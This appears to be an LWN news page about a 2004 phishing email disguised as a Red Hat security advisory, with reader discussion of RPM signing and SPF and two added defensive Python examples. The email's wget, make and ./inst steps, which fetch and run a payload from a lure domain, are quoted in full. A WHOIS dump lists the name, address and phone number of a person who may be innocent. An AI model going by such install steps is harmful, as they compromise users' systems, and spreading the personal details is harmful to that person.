
Fake Red Hat security update

From:  RedHat Security Team <security-AT-redhat.com>
To:  info-AT-eklektix.com
Subject:  RedHat: Buffer Overflow in "ls" and "mkdir"
Date:  Sun, 24 Oct 2004 17:06:50 -0500

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat 

A complete revision history is at the end of this file. 
Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow
a remote attacker to execute arbitrary code with root privileges. Some of
the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat
8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known
that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply
the fileutils-1.0.6 patch. This is a critical-critical
update that you must make by following these steps:

- First download the patch from the Security RedHat mirror:
  wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz

- Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz

- cd fileutils-1.0.6.patch

- make

- ./inst

Again, please apply this patch as soon as possible or you risk your system
and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team
Copyright © 2004 Red Hat, Inc. All rights reserved.



Fake Red Hat security update

Posted Oct 25, 2004 13:41 UTC (Mon) by haydentech (guest, #22504) [Link]

I swear, if any scammers ever bothered to learn correct English grammar or the art of spellchecking, we'd all be in trouble. Fortunately, they seem obstinately opposed to those ideas.

Fake Red Hat security update

Posted Oct 26, 2004 0:35 UTC (Tue) by Ross (subscriber, #4065) [Link]

Or learn how companies write their own name, or bother to even make the
message remotely similar to real Red Hat advisories. If they were smart
they would have made the "update" an RPM. I see no reason not to and the
fact the patch was a tarfile with a Makefile and a script would be plenty
to tell it is fake by itself.

Fake Red Hat security update

Posted Oct 28, 2004 8:43 UTC (Thu) by lacostej (subscriber, #2760) [Link]

Doesn't Red Hat sign their packages? If so a fake RPM would have been detected.

Fake Red Hat security update

Posted Oct 29, 2004 21:52 UTC (Fri) by giraffedata (subscriber, #1954) [Link]

They're not opposed, they just aren't very smart.

It's fortunate for society that the Hollywood criminal mastermind is largely a myth. Most criminals are stupid; smart people have other avenues available to achieve their goals (good job, etc.).

Fake Red Hat security update

Posted Oct 25, 2004 13:53 UTC (Mon) by alex (subscriber, #1355) [Link]

Does the email contain an attachment or is the file hosted on the site? If it's hosted on the site surely it's an easy task to trace the domain owner and charge them?

Fake Red Hat security update

Posted Oct 25, 2004 13:55 UTC (Mon) by busterb (subscriber, #560) [Link]

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com

Fake Red Hat security update

Posted Oct 25, 2004 14:38 UTC (Mon) by pascal.martin (subscriber, #2995) [Link]

The ZIP code is for Atwater, CA not New York City, NY (NYC is 01xxx.. is anyone checking addresses at the registrars?). There is a 224 Cedar Avenue there, though..

A Raymond Jackson lives there, according to the Yahoo phone book.

I suggest being polite and not overflowing the guy with phone calls: there is no proof he is not a victim as well..

It seems the site was taken down.

The script is SOOOOOO silly

Posted Oct 25, 2004 14:35 UTC (Mon) by jeld (guest, #22397) [Link]

These guys have no imagination. So, did anyone notify addlebrain.com that one of their boxen was rooted?

The script is SOOOOOO silly

Posted Oct 25, 2004 14:44 UTC (Mon) by pascal.martin (subscriber, #2995) [Link]

http://addlebrain.com was running Microsoft-IIS on Windows Server 2003 when last queried (Netcraft).

Not a root kit & no comment..

The script is SOOOOOO silly

Posted Oct 25, 2004 15:06 UTC (Mon) by jeld (guest, #22397) [Link]

Obviously it is not running IIS anymore, it runs some sort of apache. Here is the transcript:

HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Mon, 25 Oct 2004 15:04:21 GMT
Server: Apache
Last-Modified: Mon, 10 May 2004 19:45:39 GMT
ETag: "35802a-373b-40f47ec0"
Accept-Ranges: bytes
Content-Length: 14139
Connection: close
Content-Type: text/html; charset=UTF-8

addlebrain.com

Posted Oct 26, 2004 1:57 UTC (Tue) by jtc (guest, #6246) [Link]

I missed where addlebrain.com fits into this, but I get the following results from HEAD:

$ HEAD addlebrain.com
200 OK
Cache-Control: private
Connection: close
Date: Tue, 26 Oct 2004 01:55:17 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=utf-8
Client-Date: Tue, 26 Oct 2004 01:51:12 GMT
Client-Response-Num: 1
Client-Transfer-Encoding: chunked
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET

addlebrain.com

Posted Oct 26, 2004 2:54 UTC (Tue) by jeld (guest, #22397) [Link]

Well... looks like you are right, except that addlebrain.com (running IIS 6) is being redirected to www.addlebrain.com running apache. Since this is a valid site, and the email address where the script is sending cracked host info is root@addlebrain.com I figured that someone rooted one of addlebrain's boxes. Otherwise I don't know. addlebrain.com seems to belong to a company called ABM Wireless which sells cell phone accessories. MX record for addlebrain.com points to a server on everyone.net domain which is a mail hosting company. I cannot find much info about addlebrain.com IP address, but www.addlebrain.com address belongs to a dedicated web server/colocation company ThePlanet.com.

Fake Red Hat security update

Posted Oct 25, 2004 16:08 UTC (Mon) by JoeBuck (subscriber, #2330) [Link]

This shows that it was a very wise decision to add digital signatures to RPMs, and to have the rpm program verify those signatures before installation. If it were not for that, these guys could have packaged their trojan as an RPM, and with suitable trickery they might even have misled people into thinking they were getting the RPM off of a Red Hat site. But an RPM that is not signed with a key that is already loaded into the rpm database will not install.

Fake Red Hat security update

Posted Oct 25, 2004 16:51 UTC (Mon) by utidjian (subscriber, #444) [Link]

"But an RPM that is not signed with a key that is already loaded into the rpm database will not install."

That is not quite true... at least not on any Red Hat or Fedora Core systems I have. It is true that 'yum update', 'apt-get update' and up2date will not, by default, install any unsigned or incorrectly signed packages. However, a simple 'rpm -ivh someunsignedpackage.rpm' will just go right ahead and install it. -DU-...etc...
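The two posts above disagree about whether an unsigned RPM installs. Both are right about their own tools, and the practical defence is to run `rpm -K` first and refuse anything that did not pass a signature check against an imported key. The following is an added example, not code from any poster or from Red Hat; the `rpm -K` result lines are constructed samples in the style of that command's output (the unsigned case is the trap: it still ends in "OK", just without a gpg token).

```python
import subprocess

# Constructed sample lines in the style of `rpm -K` (rpm --checksig) output.
# The exact tokens differ between rpm versions, so the classifier keys on two
# stable traits: the verdict word at the end, and whether a signature was verified.
SAMPLES = {
    "signed_ok":       "fileutils-4.1-10.i386.rpm: (sha1) dsa sha1 md5 gpg OK",
    "unsigned":        "fileutils-1.0.6.i386.rpm: (sha1) dsa sha1 md5 OK",
    "unknown_key":     "fileutils-1.0.6.i386.rpm: (SHA1) DSA sha1 md5 (GPG) NOT OK "
                       "(MISSING KEYS: GPG#00000000)",   # placeholder key id
    "modern_ok":       "fileutils-4.1-10.i386.rpm: digests signatures OK",
    "modern_unsigned": "fileutils-1.0.6.i386.rpm: digests OK",
}

# Lowercase tokens rpm prints only when a signature was checked against a key
# in its database; uppercase "(GPG)" or "SIGNATURES" marks a failed check.
SIG_TOKENS = {"gpg", "pgp", "signatures"}


def classify(checksig_line):
    """Return 'signed_ok', 'unsigned' or 'bad' for one rpm -K result line."""
    _, _, result = checksig_line.partition(": ")
    if "NOT OK" in result or not result.rstrip().endswith("OK"):
        return "bad"
    tokens = set(result.split())
    return "signed_ok" if tokens & SIG_TOKENS else "unsigned"


def safe_install(rpm_path, run=subprocess.run):
    """Install only when rpm -K reports a verified signature.

    A bare `rpm -ivh` installs unsigned packages without complaint, so the
    signature check has to happen here, before install. `run` is injectable
    so the logic can be exercised without rpm present."""
    out = run(["rpm", "-K", rpm_path], capture_output=True, text=True).stdout
    lines = out.strip().splitlines() if out else []
    verdict = classify(lines[-1]) if lines else "bad"
    if verdict != "signed_ok":
        return verdict                      # caller decides how loudly to refuse
    run(["rpm", "-ivh", rpm_path], check=True)
    return "installed"


if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(f"{name:16} -> {classify(line)}")
```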

Fake Red Hat security update

Posted Oct 25, 2004 16:42 UTC (Mon) by csm1975 (guest, #15864) [Link]

SPF would prevent this sort of email from being accepted by the victim. Red Hat *DOES* have proper SPF records in DNS.

;; ANSWER SECTION:
redhat.com. 600 IN TXT "v=spf1 mx a:hormel.redhat.com a:sources.redhat.com a:alertmail.redhat.com a:bltn.redhat.com ip4:65.125.54.185 ip4:65.125.54.186 ip4:65.125.54.187 ip4:65.125.54.188 ip4:65.125.54.189 ip4:65.125.54.190 ip4:219.120.63.242 -all"

So... if persons who received this email were to implement SPF on their end they would not get another one of these that "purported" to be from redhat.com.

http://spf.pobox.com for more information.

Fake Red Hat security update

Posted Oct 25, 2004 18:25 UTC (Mon) by admcd (subscriber, #5415) [Link]

Would SPF have prevented this?

What if the e-mail came from the fedora-redhat.com domain given in the e-mail? The owner of that fake domain could even have published SPF records for it, if they really wanted to.

Fake Red Hat security update

Posted Oct 25, 2004 19:45 UTC (Mon) by csm1975 (guest, #15864) [Link]

My SPF config would have...

If it had come from the fedora-whatever site it would not have but that wouldn't have been much of a phishing attempt would it?

Fake Red Hat security update

Posted Oct 26, 2004 7:35 UTC (Tue) by admcd (subscriber, #5415) [Link]

In which case you wouldn't have clicked on the www.fedora-redhat.com link. So SPF would have made no difference either way.

Fake Red Hat security update

Posted Nov 4, 2004 15:41 UTC (Thu) by job (subscriber, #670) [Link]

No, SPF would not have prevented that. The sender would have said "MAIL
FROM: myownsite.com", and "From: security@redhat.com" to you and you
would be none the wiser. How often do you read your mail transactions to
catch that suspicious looking line? Most people never have. Yet everyone
and their dog wants to have opinions about how mail transport is done.
Learning how it works is much wiser, but few do.
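The SPF sub-thread above turns on one distinction: SPF is evaluated against the envelope sender (MAIL FROM) domain, not the From: header the reader sees. This added example (not code from any poster, and not a full SPF implementation) evaluates the redhat.com record quoted earlier against a connecting IP, and then adds the alignment check between envelope and header domain that SPF alone never makes. DNS is replaced by an in-memory table; the record for fedora-redhat.com and the 203.0.113.5 address are constructed to show that a lure domain can publish a passing record of its own.

```python
import ipaddress

# Red Hat's spf1 record as quoted in the comment above.
REDHAT_SPF = ("v=spf1 mx a:hormel.redhat.com a:sources.redhat.com a:alertmail.redhat.com "
              "a:bltn.redhat.com ip4:65.125.54.185 ip4:65.125.54.186 ip4:65.125.54.187 "
              "ip4:65.125.54.188 ip4:65.125.54.189 ip4:65.125.54.190 ip4:219.120.63.242 -all")

# Offline stand-in for DNS TXT lookups (constructed). The lure domain gets a
# record too: nothing stops a scammer from publishing SPF for their own domain.
SPF_RECORDS = {
    "redhat.com": REDHAT_SPF,
    "fedora-redhat.com": "v=spf1 ip4:203.0.113.5 -all",   # constructed, TEST-NET-3
}

VERDICT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(envelope_domain, client_ip, records=SPF_RECORDS):
    """Evaluate the ip4/ip6 and 'all' terms of an spf1 record for client_ip.

    The mx and a: mechanisms need DNS, so this offline example treats them as
    no-match (an assumption of the example, not a rule of SPF)."""
    record = records.get(envelope_domain.lower())
    if record is None or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(client_ip)
    for term in record.split()[1:]:
        qualifier = "+"                          # implicit qualifier is "+"
        if term[0] in VERDICT:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        if mech == "all":
            return VERDICT[qualifier]
        if mech in ("ip4", "ip6") and ip in ipaddress.ip_network(arg, strict=False):
            return VERDICT[qualifier]
    return "neutral"                             # no term matched and no 'all'


def domain_of(addr):
    """Domain part of 'Name <user@host>' or 'user@host'."""
    return addr.rsplit("@", 1)[-1].strip("<> ").lower()


def assess(mail_from, header_from, client_ip):
    """SPF verdict for the envelope sender, plus whether the visible From:
    header carries the same domain (the check SPF by itself does not make)."""
    spf = check_spf(domain_of(mail_from), client_ip)
    aligned = domain_of(mail_from) == domain_of(header_from)
    return spf, aligned
```

A receiver that only looks at the first element of the tuple accepts the last case below; one that also requires alignment (what DMARC later standardised) does not.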

Fake Red Hat security update

Posted Oct 25, 2004 18:52 UTC (Mon) by ccchips (guest, #3222) [Link]

I just re-read the "announcement" here.

wget?

I have a thought:

This person may be out to prove that Linux is no longer as secure as we'd like now that the average Joe can get 'hold of it, and now that it's becoming popular.

Myself, I would have caught this on a number of points:
- fedora-redhat.com is not a Red Hat site
- Bad English, as others have pointed out
- Security patch announcements from reputable companies don't come by e-mail, and if they do, the link is almost always to a site you can trust
- Security patches wouldn't be made available by "wget".

However, I am almost certain that some Windows users would have fallen for this, and I can't help but wonder if this clown was after newly-migrated Windows users.

Fake Red Hat security update

Posted Oct 26, 2004 9:06 UTC (Tue) by hppnq (guest, #14462) [Link]

I got one today that claimed to be Microsoft's. Same story, but it did look a lot more professional (working links to microsoft.com, graphics and all). I didn't have a chance to disassemble the attached update, it was removed by my ISP.

Sigh.

Fake Red Hat security update

Posted Oct 28, 2004 3:02 UTC (Thu) by marduk (subscriber, #3831) [Link]

I don't think they're out to "prove" anything regarding Linux. These are the same kinds of people who send out the fake PayPal/Citibank registration emails. They're not trying to make a statement, just trying to screw over some poor soul. The only real difference is that these guys know how to use the command line...

Fake Red Hat security update

Posted Oct 28, 2004 16:26 UTC (Thu) by bod (subscriber, #17096) [Link]

> wget?

Nothing wrong with wget. Debian security advisories routinely include
instructions for using wget as one of the ways to fetch updated packages. See http://lists.debian.org/debian-security-announce/debian-s...
for a recent example.

Note however that DSAs are both signed and include MD5 sums for the updated
packages.

Fake Red Hat security update

Posted Oct 28, 2004 19:57 UTC (Thu) by Alan_Hicks (subscriber, #20469) [Link]

- Security patch announcements from reputable companies don't come by e-mail

You just called Slackware Inc. a disreputable company by inference. Granted, Slackware Inc. only sends security advisories out by the mailing list, so if you meant that they don't randomly send out e-mails to users, you're correct.

Of course, those e-mails (as well as the packages) are digitally signed, meaning you can verify if it really did come from Slackware Inc. or not.

Fake Red Hat security update

Posted Oct 28, 2004 22:19 UTC (Thu) by BackSeat (subscriber, #1886) [Link]

> Security patch announcements from reputable companies don't come by e-mail

Most mainstream distributions have a security email list (SuSE, Gentoo, Debian, etc).

security patch announcements by email

Posted Oct 29, 2004 21:49 UTC (Fri) by giraffedata (subscriber, #1954) [Link]

A lot of people would say it's irresponsible of a company not to email its customers and tell them they need a security patch. I'm not a customer of any companies that distribute security patches, but I do occasionally get an email from my ISP urging me to get recent Windows updates.

Copyright © 2004, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.